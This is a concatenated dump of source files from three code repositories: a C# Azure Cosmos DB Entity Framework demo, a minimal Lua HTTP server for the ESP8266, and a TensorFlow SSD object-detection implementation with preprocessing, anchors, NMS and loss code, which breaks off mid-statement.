<file_sep># 4- Introduction to Azure Cosmos DB 4th meetup session on Mon, Dec 23 2019 An introduction to Azure Cosmos DB and how it is easy to migrate your existing database to Cosmos DB. <file_sep>using Microsoft.EntityFrameworkCore; namespace CosmosDemo.web.Database { public class EmployeeDbContext : DbContext { public EmployeeDbContext(DbContextOptions options) : base(options) { //Database.EnsureCreated(); } public DbSet<Employee> Employees { get; set; } protected override void OnModelCreating(ModelBuilder modelBuilder) { modelBuilder.HasDefaultContainer("employees"); modelBuilder.Entity<Employee>() .ToContainer("employees") .HasNoDiscriminator(); } } } <file_sep>using System; using System.ComponentModel.DataAnnotations; using System.ComponentModel.DataAnnotations.Schema; namespace CosmosDemo.web.Database { public class Employee { [Key,DatabaseGenerated(DatabaseGeneratedOption.None)] public string id { get; set; } public string FirstName { get; set; } public string LastName { get; set; } public DateTime HiringDate { get; set; } public string Nationality { get; set; } } }
ca5ed82aad17fe8f3fbadbdd39446568fdfb511d
[ "Markdown", "C#" ]
3
Markdown
azure-kuwait/4-Introduction-to-Azure-Cosmos-DB
1a0b4610ba9f7596fe640fa0e4cd92d95ead0786
c652d2d2edf15c4e916f70ea09ff185a401dd1b7
refs/heads/master
<repo_name>alexsuslov/esp8266-lua-httpd<file_sep>/httpd.lua -- Tiny http server local http = {} -- parse req http.req = function(req) local err = nil local REQ = {query={}, head={}} local _, _, method, path, vars = string.find(req, "^([A-Z]+) (.+)%?(.+) HTTP"); if ( method == nil ) then local _, _, method, path = string.find(req, "(^[A-Z]+) (.+) HTTP") else -- разобрать vars for k, v in string.gmatch(vars, "(%w+)=(%w+)&*") do REQ.query[k] = v end end -- @todo: parse headers -- @todo: parse body -- @todo: user auth REQ.path = path REQ.method = method return err, REQ end function http.route( socket, REQ, fn ) if file.open(REQ.method .. "_" .. REQ.path ..'lc') then file.close() -- @att: добавить в вывод -- client:send("HTTP/1.1 200 OK\r\n"); -- client:send("Content-type: text/html\r\n"); return dofile(REQ.method .. "_" .. REQ.path ..'lc')(socket, REQ, fn) else socket:send("HTTP/1.1 404 OK\r\n") fn() end end function http.done( socket ) socket:send("Connection: close\r\n\r\n"); socket:close(); collectgarbage("collect"); end function http.request( socket, req ) local err, REQ = http.req(req) if err ~= nil then socket:send("HTTP/1.1 500 OK\r\n") http.done( socket ) else http.route( socket, REQ , function() http.done(socket) end) end end function http.init( port ) -- timeout 100ms srv = net.createServer( net.TCP, 100) srv:listen( port, function(socket) socket:on("receive", http.request) end) end return http<file_sep>/README.md # esp8266-lua-httpd Simple http server # Install ```bash wget https://raw.githubusercontent.com/alexsuslov/esp8266-lua-httpd/master/httpd.lua ``` # Use ```lua httpd = require("httpd") http.init(80) ```
cb58aad3b2835140b51ac2546f3e95175627b319
[ "Markdown", "Lua" ]
2
Lua
alexsuslov/esp8266-lua-httpd
61ab8e942f88300a3cc8d565f6861552b6b7817a
b6a6c3006fd0525b528c92dbc4e40e96c3f94c88
refs/heads/master
<file_sep># deep_learning_notes 深度学习笔记 --- 深度学习算法重现 <file_sep>import tensorflow as tf import SSD.util_tf def bboxes_intersection(bbox_ref, bboxes, name=None): """Compute relative intersection between a reference box and a collection of bounding boxes. Namely, compute the quotient between intersection area and box area. Args: bbox_ref: (N, 4) or (4,) Tensor with reference bounding box(es). bboxes: (N, 4) Tensor, collection of bounding boxes. Return: (N,) Tensor with relative intersection. 计算参考框和 边界框集合。也就是说,计算 交叉区和盒子区。 ARG: b框参考:(n,4)或(4,)张量与参考边界框(es)。 bbox:(n,4)张量,边界框集合。 返回: (n,)张量与相对交集。 """ with tf.name_scope(name, 'bboxes_intersection'): # Should be more efficient to first transpose. bboxes = tf.transpose(bboxes) bbox_ref = tf.transpose(bbox_ref) # Intersection bbox and volume. int_ymin = tf.maximum(bboxes[0], bbox_ref[0]) int_xmin = tf.maximum(bboxes[1], bbox_ref[1]) int_ymax = tf.minimum(bboxes[2], bbox_ref[2]) int_xmax = tf.minimum(bboxes[3], bbox_ref[3]) h = tf.maximum(int_ymax - int_ymin, 0.) w = tf.maximum(int_xmax - int_xmin, 0.) # Volumes. inter_vol = h * w # 各个框在[0,0,1,1]内的面积 bboxes_vol = (bboxes[2] - bboxes[0]) * (bboxes[3] - bboxes[1]) # 各个框面积 scores = tf.where( tf.greater(bboxes_vol, 0), tf.divide(inter_vol, bboxes_vol), tf.zeros_like(inter_vol), name='intersection') return scores def bboxes_filter_overlap(labels, bboxes, threshold=0.5, assign_negative=False, scope=None): """Filter out bounding boxes based on (relative )overlap with reference box [0, 0, 1, 1]. Remove completely bounding boxes, or assign negative labels to the one outside (useful for latter processing...). Return: labels, bboxes: Filtered (or newly assigned) elements. """ with tf.name_scope(scope, 'bboxes_filter', [labels, bboxes]): # (N,) Tensor:和[0,0,1,1]相交面积大于0的位置返回面积比(相交/原本),小于0的位置返回0 scores = bboxes_intersection(tf.constant([0, 0, 1, 1], bboxes.dtype), bboxes) mask = scores > threshold if assign_negative: # 保留所有的label和框,重叠区不够的label置负 labels = tf.where(mask, labels, -labels) # 交叉满足的标记为正,否则为负 else: # 删除重叠区不够的label和框 labels = tf.boolean_mask(labels, mask) # bool掩码,类似于array的bool切片 bboxes = tf.boolean_mask(bboxes, mask) return labels, bboxes def bboxes_resize(bbox_ref, bboxes, name=None): """ 使用新的参考点和基底长度(bbox_ref)重置bboxes的表示 :param bbox_ref: 参考框,左上角点为新的参考点,hw为新的参考基 :param bboxes: 目标框 :param name: 域名 :return: 目标框重新表示后的写法 """ # Tensors inputs. with tf.name_scope(name, 'bboxes_resize'): # Translate. # bbox_ref:['ymin', 'xmin', 'ymax', 'xmax'] v = tf.stack([bbox_ref[0], bbox_ref[1], bbox_ref[0], bbox_ref[1]]) bboxes = bboxes - v # Scale. s = tf.stack([bbox_ref[2] - bbox_ref[0], # h bbox_ref[3] - bbox_ref[1], # w bbox_ref[2] - bbox_ref[0], bbox_ref[3] - bbox_ref[1]]) bboxes = bboxes / s return bboxes def distorted_bounding_box_crop(image, labels, bboxes, min_object_covered=0.3, aspect_ratio_range=(0.9, 1.1), area_range=(0.1, 1.0), max_attempts=200, scope=None): """Generates cropped_image using a one of the bboxes randomly distorted. See `tf.image.sample_distorted_bounding_box` for more documentation. Args: image: 3-D Tensor of image (it will be converted to floats in [0, 1]). bbox: 3-D float Tensor of bounding boxes arranged [1, num_boxes, coords] where each coordinate is [0, 1) and the coordinates are arranged as [ymin, xmin, ymax, xmax]. If num_boxes is 0 then it would use the whole image. min_object_covered: An optional `float`. Defaults to `0.1`. The cropped area of the image must contain at least this fraction of any bounding box supplied. aspect_ratio_range: An optional list of `floats`. The cropped area of the image must have an aspect ratio = width / height within this range. area_range: An optional list of `floats`. The cropped area of the image must contain a fraction of the supplied image within in this range. max_attempts: An optional `int`. Number of attempts at generating a cropped region of the image of the specified constraints. After `max_attempts` failures, return the entire image. scope: Optional scope for name_scope. Returns: A tuple, a 3-D Tensor cropped_image and the distorted bbox """ with tf.name_scope(scope, 'distorted_bounding_box_crop', [image, bboxes]): # 高级的随机裁剪 # The bounding box coordinates are floats in `[0.0, 1.0]` relative to the width # and height of the underlying image. # 1-D, 1-D, [1, 1, 4] bbox_begin, bbox_size, distort_bbox = tf.image.sample_distorted_bounding_box( tf.shape(image), bounding_boxes=tf.expand_dims(bboxes, 0), # [1, n, 4] min_object_covered=min_object_covered, aspect_ratio_range=aspect_ratio_range, area_range=area_range, max_attempts=max_attempts, # 最大尝试裁剪次数,失败则返回原图 use_image_if_no_bounding_boxes=True) ''' Returns: A tuple of `Tensor` objects (begin, size, bboxes). begin: A `Tensor`. Has the same type as `image_size`. 1-D, containing `[offset_height, offset_width, 0]`. Provide as input to `tf.slice`. size: A `Tensor`. Has the same type as `image_size`. 1-D, containing `[target_height, target_width, -1]`. Provide as input to `tf.slice`. bboxes: A `Tensor` of type `float32`. 3-D with shape `[1, 1, 4]` containing the distorted bounding box. Provide as input to `tf.image.draw_bounding_boxes`. ''' # [4],裁剪结果相对原图的(y, x, h, w) distort_bbox = distort_bbox[0, 0] # Crop the image to the specified bounding box. cropped_image = tf.slice(image, bbox_begin, bbox_size) # Restore the shape since the dynamic slice loses 3rd dimension. cropped_image.set_shape([None, None, 3]) # <-----设置了尺寸了哈 # Update bounding boxes: resize and filter out. # 以裁剪子图为参考,将bboxes更换参考点和基长度 bboxes = bboxes_resize(distort_bbox, bboxes) # [4], [n, 4] # 筛选变换后的bboxes和裁剪子图交集大于阈值的图bboxes labels, bboxes = bboxes_filter_overlap(labels, bboxes, threshold=0.5, assign_negative=False) # 返回随机裁剪的图片,筛选调整后的labels(n,)、bboxes(n, 4),裁剪图片对应原图坐标(4,) return cropped_image, labels, bboxes, distort_bbox def preprocess_image(image, labels, bboxes, out_shape, scope='ssd_preprocessing_train'): with tf.name_scope(scope, 'ssd_preprocessing_train', [image, labels, bboxes]): if image.get_shape().ndims != 3: raise ValueError('Input must be of size [height, width, C>0]') # Convert to float scaled [0, 1]. # 并不单单是float化,而是将255像素表示放缩为01表示 if image.dtype != tf.float32: image = tf.image.convert_image_dtype(image, dtype=tf.float32) # (有条件的)随机裁剪,筛选调整后的labels(n,)、bboxes(n, 4),裁剪图片对应原图坐标(4,) dst_image, labels, bboxes, distort_bbox = \ distorted_bounding_box_crop(image, labels, bboxes, min_object_covered=0.25, aspect_ratio_range=(0.6, 1.67)) # Resize image to output size. dst_image = SSD.util_tf.resize_image(dst_image, out_shape, method=tf.image.ResizeMethod.BILINEAR, align_corners=False) # Randomly flip the image horizontally. dst_image, bboxes = SSD.util_tf.random_flip_left_right(dst_image, bboxes) # Randomly distort the colors. There are 4 ways to do it. dst_image = SSD.util_tf.apply_with_random_selector( dst_image, lambda x, ordering: SSD.util_tf.distort_color(x, ordering, False), num_cases=4) # Rescale to VGG input scale. image = dst_image * 255. image = SSD.util_tf.tf_image_whitened(image) # mean = tf.constant(means, dtype=image.dtype) # image = image - mean # 'NHWC' (n,) (n, 4) return image, labels, bboxes <file_sep>import tensorflow as tf import numpy as np import cv2 import datetime class ssd(object): def __init__(self): self.feature_map_size = [[38, 38], [19, 19], [10, 10], [5, 5], [3, 3], [1, 1]] self.classes = ["aeroplane", "bicycle", "bird", "boat", "bottle", "bus", "car", "cat", "chair", "cow", "diningtable", "dog", "horse", "motorbike", "person", "pottedplant", "sheep", "sofa", "train", "tvmonitor"] self.feature_layers = ['block4', 'block7', 'block8', 'block9', 'block10', 'block11'] self.img_size = (300,300) self.num_classes = 21 self.boxes_len = [4,6,6,6,4,4] self.isL2norm = [True,False,False,False,False,False] self.anchor_sizes = [[21., 45.], [45., 99.], [99., 153.],[153., 207.],[207., 261.], [261., 315.]] self.anchor_ratios = [[2, .5], [2, .5, 3, 1. / 3], [2, .5, 3, 1. / 3], [2, .5, 3, 1. / 3], [2, .5], [2, .5]] # self.anchor_steps = [8, 16, 32, 64, 100, 300] self.anchor_steps = [8, 16, 30, 60, 100, 300] self.prior_scaling = [0.1, 0.1, 0.2, 0.2] #特征图先验框缩放比例 self.n_boxes = [5776,2166,600,150,36,4] #8732个 self.threshold = 0.25 ########### ssd网络架构部分 def l2norm(self,x, trainable=True, scope='L2Normalization'): n_channels = x.get_shape().as_list()[-1] # 通道数 l2_norm = tf.nn.l2_normalize(x, dim=[3], epsilon=1e-12) # 只对每个像素点在channels上做归一化 with tf.variable_scope(scope): gamma = tf.get_variable("gamma", shape=[n_channels, ], dtype=tf.float32, trainable=trainable) return l2_norm * gamma def conv2d(self,x,filter,k_size,stride=[1,1],padding='same',dilation=[1,1],activation=tf.nn.relu,scope='conv2d'): return tf.layers.conv2d(inputs=x, filters=filter, kernel_size=k_size, strides=stride, dilation_rate=dilation, padding=padding, name=scope, activation=activation) def max_pool2d(self,x, pool_size, stride, scope='max_pool2d'): return tf.layers.max_pooling2d(inputs=x, pool_size=pool_size, strides=stride, name=scope, padding='same') def pad2d(self,x, pad): return tf.pad(x, paddings=[[0, 0], [pad, pad], [pad, pad], [0, 0]]) def dropout(self,x, d_rate=0.5): return tf.layers.dropout(inputs=x, rate=d_rate) def ssd_prediction(self, x, num_classes, box_num, isL2norm, scope='multibox'): reshape = [-1] + x.get_shape().as_list()[1:-1] # 去除第一个和最后一个得到shape with tf.variable_scope(scope): if isL2norm: x = self.l2norm(x) print(x) # #预测位置 --》 坐标和大小 回归 location_pred = self.conv2d(x, filter=box_num * 4, k_size=[3,3], activation=None,scope='conv_loc') location_pred = tf.reshape(location_pred, reshape + [box_num, 4]) # 预测类别 --> 分类 sofrmax class_pred = self.conv2d(x, filter=box_num * num_classes, k_size=[3,3], activation=None, scope='conv_cls') class_pred = tf.reshape(class_pred, reshape + [box_num, num_classes]) print(location_pred, class_pred) return location_pred, class_pred def set_net(self,x=None): check_points = {} predictions = [] locations = [] logit = [] x_re = False if x is None: x = tf.placeholder(dtype=tf.float32,shape=[None,300,300,3]) x_re = True with tf.variable_scope('ssd_300_vgg'): #b1 net = self.conv2d(x,filter=64,k_size=[3,3],scope='conv1_1') net = self.conv2d(net,64,[3,3],scope='conv1_2') net = self.max_pool2d(net,pool_size=[2,2],stride=[2,2],scope='pool1') #b2 net = self.conv2d(net, filter=128, k_size=[3, 3], scope='conv2_1') net = self.conv2d(net, 128, [3, 3], scope='conv2_2') net = self.max_pool2d(net, pool_size=[2, 2], stride=[2, 2], scope='pool2') #b3 net = self.conv2d(net, filter=256, k_size=[3, 3], scope='conv3_1') net = self.conv2d(net, 256, [3, 3], scope='conv3_2') net = self.conv2d(net, 256, [3, 3], scope='conv3_3') net = self.max_pool2d(net, pool_size=[2, 2], stride=[2, 2], scope='pool3') #b4 net = self.conv2d(net, filter=512, k_size=[3, 3], scope='conv4_1') net = self.conv2d(net, 512, [3, 3], scope='conv4_2') net = self.conv2d(net, 512, [3, 3], scope='conv4_3') print(net) check_points['block4'] = net net = self.max_pool2d(net, pool_size=[2, 2], stride=[2, 2], scope='pool4') print('pool4', net) #b5 net = self.conv2d(net, filter=512, k_size=[3, 3], scope='conv5_1') net = self.conv2d(net, 512, [3, 3], scope='conv5_2') net = self.conv2d(net, 512, [3, 3], scope='conv5_3') print('conv5_3',net) net = self.max_pool2d(net, pool_size=[3, 3], stride=[1, 1], scope='pool5') print('pool5',net) #b6 net = self.conv2d(net,1024,[3,3],dilation=[6,6],scope='conv6') print('conv6',net) #b7 net = self.conv2d(net,1024,[1,1],scope='conv7') print('conv7',net) check_points['block7'] = net #b8],scope='conv8_1x1') net = self.conv2d(net, 256, [1, 1], scope='conv8_1x1') print('conv8_3',net) net = self.conv2d(self.pad2d(net, 1), 512, [3, 3], [2, 2], scope='conv8_3x3', padding='valid') check_points['block8'] = net #b9 net = self.conv2d(net, 128, [1, 1], scope='conv9_1x1') net = self.conv2d(self.pad2d(net,1), 256, [3, 3], [2, 2], scope='conv9_3x3', padding='valid') check_points['block9'] = net #b10 net = self.conv2d(net, 128, [1, 1], scope='conv10_1x1') net = self.conv2d(net, 256, [3, 3], scope='conv10_3x3', padding='valid') check_points['block10'] = net #b11 net = self.conv2d(net, 128, [1, 1], scope='conv11_1x1') net = self.conv2d(net, 256, [3, 3], scope='conv11_3x3', padding='valid') check_points['block11'] = net for i,j in enumerate(self.feature_layers): loc,cls = self.ssd_prediction( x = check_points[j], num_classes = self.num_classes, box_num = self.boxes_len[i], isL2norm = self.isL2norm[i], scope = j + '_box' ) logit.append(cls) predictions.append(tf.nn.softmax(cls)) locations.append(loc) if x_re: return locations, predictions,x else: return locations,predictions,logit ########### ssd网络架构部分结束 ########## 先验框部分开始 #先验框生成 def ssd_anchor_layer(self,img_size,feature_map_size,anchor_size,anchor_ratio,anchor_step,box_num,offset=0.5): y,x = np.mgrid[0:feature_map_size[0],0:feature_map_size[1]] y = (y.astype(np.float32) + offset) * anchor_step /img_size[0] x = (x.astype(np.float32) + offset) * anchor_step /img_size[1] y = np.expand_dims(y,axis=-1) x = np.expand_dims(x,axis=-1) #计算两个长宽比为1的h、w h = np.zeros((box_num,),np.float32) w = np.zeros((box_num,),np.float32) h[0] = anchor_size[0] /img_size[0] w[0] = anchor_size[0] /img_size[0] h[1] = (anchor_size[0] * anchor_size[1]) ** 0.5 / img_size[0] w[1] = (anchor_size[0] * anchor_size[1]) ** 0.5 / img_size[1] for i,j in enumerate(anchor_ratio): h[i + 2] = anchor_size[0] / img_size[0] / (j ** 0.5) w[i + 2] = anchor_size[0] / img_size[1] * (j ** 0.5) return y,x,h,w #解码网络 def ssd_decode(self,location,box,prior_scaling): y_a, x_a, h_a, w_a = box cx = location[:, :, :, :, 0] * w_a * prior_scaling[0] + x_a ######################### cy = location[:, :, :, :, 1] * h_a * prior_scaling[1] + y_a w = w_a * tf.exp(location[:, :, :, :, 2] * prior_scaling[2]) h = h_a * tf.exp(location[:, :, :, :, 3] * prior_scaling[3]) bboxes = tf.stack([cy - h / 2.0, cx - w / 2.0, cy + h / 2.0, cx + w / 2.0], axis=-1) return bboxes #先验框筛选 def choose_anchor_boxes(self, predictions, anchor_box, n_box): anchor_box = tf.reshape(anchor_box, [n_box, 4]) prediction = tf.reshape(predictions, [n_box, 21]) prediction = prediction[:, 1:] classes = tf.argmax(prediction, axis=1) + 1 scores = tf.reduce_max(prediction, axis=1) filter_mask = scores > self.threshold classes = tf.boolean_mask(classes, filter_mask) scores = tf.boolean_mask(scores, filter_mask) anchor_box = tf.boolean_mask(anchor_box, filter_mask) return classes, scores, anchor_box ########## 先验框部分结束 ######### 训练部分开始 def bboxes_sort(self,classes, scores, bboxes, top_k=400): idxes = np.argsort(-scores) classes = classes[idxes][:top_k] scores = scores[idxes][:top_k] bboxes = bboxes[idxes][:top_k] return classes, scores, bboxes # 计算IOU def bboxes_iou(self,bboxes1, bboxes2): bboxes1 = np.transpose(bboxes1) bboxes2 = np.transpose(bboxes2) # 计算两个box的交集:交集左上角的点取两个box的max,交集右下角的点取两个box的min int_ymin = np.maximum(bboxes1[0], bboxes2[0]) int_xmin = np.maximum(bboxes1[1], bboxes2[1]) int_ymax = np.minimum(bboxes1[2], bboxes2[2]) int_xmax = np.minimum(bboxes1[3], bboxes2[3]) # 计算两个box交集的wh:如果两个box没有交集,那么wh为0(按照计算方式wh为负数,跟0比较取最大值) int_h = np.maximum(int_ymax - int_ymin, 0.) int_w = np.maximum(int_xmax - int_xmin, 0.) # 计算IOU int_vol = int_h * int_w # 交集面积 vol1 = (bboxes1[2] - bboxes1[0]) * (bboxes1[3] - bboxes1[1]) # bboxes1面积 vol2 = (bboxes2[2] - bboxes2[0]) * (bboxes2[3] - bboxes2[1]) # bboxes2面积 iou = int_vol / (vol1 + vol2 - int_vol) # IOU=交集/并集 return iou # NMS def bboxes_nms(self,classes, scores, bboxes, nms_threshold=0.5): keep_bboxes = np.ones(scores.shape, dtype=np.bool) for i in range(scores.size - 1): if keep_bboxes[i]: overlap = self.bboxes_iou(bboxes[i], bboxes[(i + 1):]) keep_overlap = np.logical_or(overlap < nms_threshold, classes[(i + 1):] != classes[i]) keep_bboxes[(i + 1):] = np.logical_and(keep_bboxes[(i + 1):], keep_overlap) idxes = np.where(keep_bboxes) return classes[idxes], scores[idxes], bboxes[idxes] ######## 训练部分结束 def handle_img(self,img_path): means = np.array((123., 117., 104.)) self.img = cv2.imread(img_path) # img = self.img # img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB) - means # img = cv2.resize(img,self.img_size) # img = np.expand_dims(img,axis=0) img = np.expand_dims(cv2.resize(cv2.cvtColor(self.img, cv2.COLOR_BGR2RGB) - means,self.img_size),axis=0) return img def draw_rectangle(self,img, classes, scores, bboxes, colors, thickness=2): shape = img.shape for i in range(bboxes.shape[0]): bbox = bboxes[i] # color = colors[classes[i]] p1 = (int(bbox[0] * shape[0]), int(bbox[1] * shape[1])) p2 = (int(bbox[2] * shape[0]), int(bbox[3] * shape[1])) cv2.rectangle(img, p1[::-1], p2[::-1], colors[1], 1) # Draw text... s = '%s/%.3f' % (self.classes[classes[i] - 1], scores[i]) p1 = (p1[0] - 5, p1[1]) cv2.putText(img, s, p1[::-1], cv2.FONT_HERSHEY_DUPLEX, 0.5, colors[1], 1) # cv2.namedWindow("ssd", 0); # cv2.resizeWindow("ssd", 640, 480); cv2.imshow('ssd', img) cv2.waitKey(0) cv2.destroyAllWindows() def run_this(self,locations,predictions): layers_anchors = [] classes_list = [] scores_list = [] bboxes_list = [] for i, s in enumerate(self.feature_map_size): anchor_bboxes = self.ssd_anchor_layer(self.img_size, s, self.anchor_sizes[i], self.anchor_ratios[i], self.anchor_steps[i], self.boxes_len[i]) layers_anchors.append(anchor_bboxes) for i in range(len(predictions)): d_box = self.ssd_decode(locations[i], layers_anchors[i], self.prior_scaling) cls, sco, box = self.choose_anchor_boxes(predictions[i], d_box, self.n_boxes[i]) classes_list.append(cls) scores_list.append(sco) bboxes_list.append(box) classes = tf.concat(classes_list, axis=0) scores = tf.concat(scores_list, axis=0) bboxes = tf.concat(bboxes_list, axis=0) return classes,scores,bboxes def bboxes_encode(self, labels, bboxes, anchors, scope=None): target_labels, target_localizations, target_scores = tf_ssd_bboxes_encode( labels, bboxes, anchors, self.num_classes, prior_scaling=self.prior_scaling, scope=scope) return target_labels, target_localizations, target_scores def smooth_L1(self,x): absx = tf.abs(x) minx = tf.minimum(absx, 1) r = 0.5 * ((absx - 1) * minx + absx) return r def ssd_losses(self,logits, localisations, # 预测类别,位置 gclasses, glocalisations, gscores, # ground truth类别,位置,得分 match_threshold=0.5, negative_ratio=3., alpha=1., scope=None): ''' n_neg就是负样本的数量,negative_ratio正负样本比列,默认就是3, 后面的第一个取最大,我觉得是保证至少有负样本, max_neg_entries这个就是负样本的数量,n_neg = tf.minimum(n_neg, max_neg_entries),这个比较很好理解,万一 你总样本比你三倍正样本少,所以需要选择小的,所以这个地方保证足够的负样本,nmask表示我们所选取的负样本, tf.nn.top_k,这个是选取前k = neg个负例,因为取了负号,表示选择的交并比最小的k个,minval就是选择负例里面交并比 最大的,nmask就是把我们选择的负样例设为整数,就是提取出我们选择的,tf.logical_and就是同时为真,首先。需要是 负例,其次值需要大于minval,因为取了负数,所以nmask就是我们所选择的负例,fnmask就是就是我们选取的负样本只是 数据类型变了,由bool变为了浮点型,(dtype默认是浮点型) ''' with tf.name_scope(scope, 'ssd_losses'): # 提取类别数和batch_size # tensor_shape函数可以取代 num_classes = int(logits[0].shape[-1]) batch_size = int(logits[0].shape[0]) print('num_cl,batch',num_classes,batch_size) # Flatten out all vectors! flogits = [] fgclasses = [] fgscores = [] flocalisations = [] fglocalisations = [] for i in range(len(logits)): # 按照图片循环 flogits.append(tf.reshape(logits[i], [-1, num_classes])) fgclasses.append(tf.reshape(gclasses[i], [-1])) fgscores.append(tf.reshape(gscores[i], [-1])) flocalisations.append(tf.reshape(localisations[i], [-1, 4])) fglocalisations.append(tf.reshape(glocalisations[i], [-1, 4])) # And concat the crap! # logits (none,38,38,4,21) logits = tf.concat(flogits, axis=0) # 全部的搜索框,对应的21类别的输出 gclasses = tf.concat(fgclasses, axis=0) # 全部的搜索框,真实的类别数字 gscores = tf.concat(fgscores, axis=0) # 全部的搜索框,和真实框的IOU localisations = tf.concat(flocalisations, axis=0) glocalisations = tf.concat(fglocalisations, axis=0) dtype = logits.dtype pmask = gscores > match_threshold # (全部搜索框数目, 21),类别搜索框和真实框IOU大于阈值 fpmask = tf.cast(pmask, dtype) # 浮点型前景掩码(前景假定为含有对象的IOU足够的搜索框标号) n_positives = tf.reduce_sum(fpmask) # tp总数 # Hard negative mining... no_classes = tf.cast(pmask, tf.int32) predictions = tf.nn.softmax(logits) # 此时每一行的21个数转化为概率 nmask = tf.logical_and(tf.logical_not(pmask), gscores > -0.5) # IOU达不到阈值的类别搜索框位置记1 print(nmask) fnmask = tf.cast(nmask, dtype) nvalues = tf.where(nmask, predictions[:, 0], # 框内无物体标记为背景预测概率 1. - fnmask) # 框内有物体位置标记为1 nvalues_flat = tf.reshape(nvalues, [-1]) # Number of negative entries to select. # 在nmask中剔除n_neg个最不可能背景点(对应的class0概率最低) max_neg_entries = tf.cast(tf.reduce_sum(fnmask), tf.int32) # 3 × tpmask n_negs = tf.cast(negative_ratio * n_positives, tf.int32) n_neg = tf.minimum(n_negs, max_neg_entries) val, idxes = tf.nn.top_k(-nvalues_flat, k=n_neg) # 最不可能为背景的n_neg个点 max_hard_pred = -val[-1] # Final negative mask. nmask = tf.logical_and(nmask, nvalues < max_hard_pred) # 不是前景,又最不像背景的n_neg个点 fnmask = tf.cast(nmask, dtype) # Add cross-entropy loss. with tf.name_scope('cross_entropy_pos'): loss = tf.nn.sparse_softmax_cross_entropy_with_logits(logits=logits, labels=gclasses) # 0-20 loss_pos = tf.div(tf.reduce_sum(loss * fpmask), batch_size,name='value') with tf.name_scope('cross_entropy_neg'): loss = tf.nn.sparse_softmax_cross_entropy_with_logits(logits=logits, labels=no_classes) # {0,1} loss_neg = tf.div(tf.reduce_sum(loss * fnmask), batch_size,name='value') # Add localization loss: smooth L1, L2, ... with tf.name_scope('localization'): # Weights Tensor: positive mask + random negative. weights = tf.expand_dims(alpha * fpmask, axis=-1) # alpha * fpm = (n,) loss = self.smooth_L1(localisations - glocalisations) #(m,n) loss_loc = tf.div(tf.reduce_sum(loss * weights), batch_size,name='value') return loss_pos,loss_neg,loss_loc def tf_ssd_bboxes_encode(labels, #编码:真实值和ANCHOR BOX 、编码 bboxes, anchors, num_classes, prior_scaling=(0.1, 0.1, 0.2, 0.2), dtype=tf.float32, scope='ssd_bboxes_encode'): with tf.name_scope(scope): target_labels = [] target_localizations = [] target_scores = [] for i, anchors_layer in enumerate(anchors): with tf.name_scope('bboxes_encode_block_%i' % i): # (m,m,k),xywh(m,m,4k),(m,m,k) t_labels, t_loc, t_scores = tf_ssd_bboxes_encode_layer(labels, bboxes, anchors_layer, num_classes) target_labels.append(t_labels) target_localizations.append(t_loc) target_scores.append(t_scores) return target_labels, target_localizations, target_scores def tf_ssd_bboxes_encode_layer(labels, # (n,) bboxes, # (n, 4) anchors_layer, # y(m, m, 1), x(m, m, 1), h(k,), w(k,) num_classes, prior_scaling=(0.1, 0.1, 0.2, 0.2), dtype=tf.float32): yref, xref, href, wref = anchors_layer ymin = yref - href / 2. xmin = xref - wref / 2. ymax = yref + href / 2. xmax = xref + wref / 2. vol_anchors = (xmax - xmin) * (ymax - ymin) shape = (yref.shape[0], yref.shape[1], href.size) feat_labels = tf.zeros(shape, dtype=tf.int64) # (m, m, k) feat_scores = tf.zeros(shape, dtype=dtype) feat_ymin = tf.zeros(shape, dtype=dtype) feat_xmin = tf.zeros(shape, dtype=dtype) feat_ymax = tf.ones(shape, dtype=dtype) feat_xmax = tf.ones(shape, dtype=dtype) def jaccard_with_anchors(bbox): int_ymin = tf.maximum(ymin, bbox[0]) # (m, m, k) int_xmin = tf.maximum(xmin, bbox[1]) int_ymax = tf.minimum(ymax, bbox[2]) int_xmax = tf.minimum(xmax, bbox[3]) h = tf.maximum(int_ymax - int_ymin, 0.) w = tf.maximum(int_xmax - int_xmin, 0.) # Volumes. # 处理搜索框和bbox之间的联系 inter_vol = h * w # 交集面积 union_vol = vol_anchors - inter_vol \ + (bbox[2] - bbox[0]) * (bbox[3] - bbox[1]) # 并集面积 jaccard = tf.div(inter_vol, union_vol) # 交集/并集,即IOU return jaccard # (m, m, k) def condition(i,feat_labels, feat_scores, feat_ymin, feat_xmin, feat_ymax, feat_xmax): r = tf.less(i, tf.shape(labels)) return r[0] def body(i, feat_labels, feat_scores, feat_ymin, feat_xmin, feat_ymax, feat_xmax): """ 更新功能标签、分数和bbox。 -JacCard>0.5时赋值; """ label = labels[i] # 当前图片上第i个对象的标签 bbox = bboxes[i] # 当前图片上第i个对象的真实框bbox jaccard = jaccard_with_anchors(bbox) # 当前对象的bbox和当前层的搜索网格IOU mask = tf.greater(jaccard, feat_scores) # 掩码矩阵,IOU大于历史得分的为True mask = tf.logical_and(mask, feat_scores > -0.5) imask = tf.cast(mask, tf.int64) #[1,0,1,1,0] fmask = tf.cast(mask, dtype) #[1.,0.,1.,0. ... ] # Update values using mask. # 保证feat_labels存储对应位置得分最大对象标签,feat_scores存储那个得分 # (m, m, k) × 当前类别 + (1 - (m, m, k)) × (m, m, k) # 更新label记录,此时的imask已经保证了True位置当前对像得分高于之前的对象得分,其他位置值不变 feat_labels = imask * label + (1 - imask) * feat_labels # 更新score记录,mask为True使用本类别IOU,否则不变 feat_scores = tf.where(mask, jaccard, feat_scores) # 下面四个矩阵存储对应label的真实框坐标 # (m, m, k) × 当前框坐标scalar + (1 - (m, m, k)) × (m, m, k) feat_ymin = fmask * bbox[0] + (1 - fmask) * feat_ymin feat_xmin = fmask * bbox[1] + (1 - fmask) * feat_xmin feat_ymax = fmask * bbox[2] + (1 - fmask) * feat_ymax feat_xmax = fmask * bbox[3] + (1 - fmask) * feat_xmax return [i + 1, feat_labels, feat_scores, feat_ymin, feat_xmin, feat_ymax, feat_xmax] i = 0 (i, feat_labels, feat_scores, feat_ymin, feat_xmin, feat_ymax, feat_xmax) = tf.while_loop(condition, body, [i, feat_labels, feat_scores, feat_ymin, feat_xmin, feat_ymax, feat_xmax]) # Transform to center / size. # 这里的y、x、h、w指的是对应位置所属真实框的相关属性 feat_cy = (feat_ymax + feat_ymin) / 2. feat_cx = (feat_xmax + feat_xmin) / 2. feat_h = feat_ymax - feat_ymin feat_w = feat_xmax - feat_xmin # Encode features. # ((m, m, k) - (m, m, 1)) / (k,) * 10 # 以搜索网格中心点为参考,真实框中心的偏移,单位长度为网格hw feat_cy = (feat_cy - yref) / href / prior_scaling[0] feat_cx = (feat_cx - xref) / wref / prior_scaling[1] # log((m, m, k) / (m, m, 1)) * 5 # 真实框宽高/搜索网格宽高,取对 feat_h = 